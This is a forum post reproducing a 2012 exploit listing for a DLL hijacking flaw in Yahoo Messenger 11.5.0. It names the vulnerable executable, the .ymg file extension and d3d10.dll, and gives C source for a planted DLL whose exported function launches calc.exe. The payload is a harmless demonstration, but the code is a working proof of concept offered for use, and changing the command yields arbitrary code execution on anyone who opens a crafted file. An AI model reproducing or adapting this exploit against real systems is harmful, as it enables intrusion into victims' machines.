Jump to content
co4ie

Yahoo Messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit

Recommended Posts

Exploit Title: yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit

Date: 2012-08-23

Author: coolkaveh

Version: 11.5.0228-us

Tested on: windows XP Sp3 ENG

---------------------------------------------------------

# Vulnerable: yahoomessenger.exe

---------------------------------------------------------

# Vulnerable extensions: .ymg

---------------------------------------------------------

# Vulnerable Dll: d3d10.dll

---------------------------------------------------------

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void hook_startup() { exp(); }

int exp()
{
WinExec("calc", 0);
exit(0);
return 0;
}

Sursa

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...